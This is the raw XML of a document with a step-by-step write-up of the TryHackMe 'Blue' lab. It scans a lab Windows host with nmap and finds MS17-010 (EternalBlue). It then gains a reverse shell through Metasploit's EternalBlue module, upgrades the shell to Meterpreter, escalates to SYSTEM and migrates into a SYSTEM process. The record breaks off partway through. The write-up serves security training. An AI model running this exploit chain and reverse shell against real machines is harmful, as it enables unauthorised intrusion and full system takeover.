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C1F4AB">
      <w:r>
        <w:t>Esraa Waleed Sharaf Eldeen Abdul Hafez.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53E14B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7C70C71A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-GB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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-GB"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1">
                <w14:lumMod w14:val="100000"/>
                <w14:lumOff w14:val="0"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Blue Room - TryHackMe Full Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A695A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Apto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Objective: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Deploy &amp; hack into a Windows machine, leveraging common misconfiguration issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD44860">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="299" w:beforeAutospacing="0" w:after="299" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Task 1 – Scanning the Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7EED5">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr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Step 1: Start the AttackBox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520A4DC">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Open the AttackBox on TryHackMe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2B816">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr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Step 2: Scan for Open Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46998149">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Apto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Command used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nmap -p- 10.10.142.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366FAC7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Result: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Open Ports under 1000: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Observation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only 3 ports under 1000 are open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F064D4">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>135/tcp   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFBCF3">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>139/tcp   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F96E61">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>445/tcp   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC7EDD9">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4450715" cy="2347595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5388096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641" name="draw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903" cy="23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70DA">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr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Step 3: Vulnerability Scan on SMB Port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AC376">
      <w:pPr>
        <w:pStyle w:val="10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lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nmap -Pn --script vuln -p445 10.10.142.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9E74E">
      <w:pPr>
        <w:pStyle w:val="10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lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E356E2A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Vulnerable to: ms17-010 (SMBv1 Remote Code Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA98639">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CVE: CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF8407">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Risk Factor: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4417D7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the famous EternalBlue vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096644D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="299" w:beforeAutospacing="0" w:after="299" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Task 2 – Gain Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0ADD3">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:b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Step 1: Open Metasploit--&gt; by using msfconsole ....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3A350">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:b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Step 2: Load Exploit Module --&gt; using command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0F387">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>---(use exploit/windows/smb/ms17_010_eternalblue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAEFA1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5153025" cy="2992120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23087994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79948" name="drawing"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="1826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98DB">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775B4235">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/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Step 3: Set Required Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F7820">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/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Required Option: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS:--&gt; by using command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set RHOSTS 10.10.142.22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4402455" cy="2336165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7684547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737" name="draw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2463" cy="23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FC3">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBFF75F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-We will show the options again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597EB1EF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4116705" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18858976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97605" name="drawing"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect l="4492" r="5324" b="18511"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4117338" cy="30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8DF5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Payload: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set payload windows/x64/shell/reverse_tcp ---set LHOST(-------)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7B80A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4810125" cy="2496820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13743540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4020" name="drawi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34C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Run Exploit : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B25FCC">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Observation: You should get a shell. Background it with Ctrl + Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C606E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4876800" cy="2432685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16502544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4498" name="drawi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0ED5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="299" w:beforeAutospacing="0" w:after="299" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Task 3 – Privilege Escalation &amp; Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1725B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6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Step 1: Convert Shell to Meterpreter--&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>use post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B589A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:i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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Required Option:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (select your shell session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430308E">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands:  set SESSION 1 --&gt; run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6B78D">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4513580" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2598318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31818" name="draw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107" cy="24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DF94">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670305D9">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6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Step 2: Escalate Privileges to SYSTEM --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F38926">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0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Verify: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami    ---&gt; NT AUTHORITY\SYSTEM : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>this what returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F813E9">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 3: Migrate to SYSTEM Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED383E">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>List processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F917BEF">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Select a process running as SYSTEM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>migrate 1400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E1C87">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
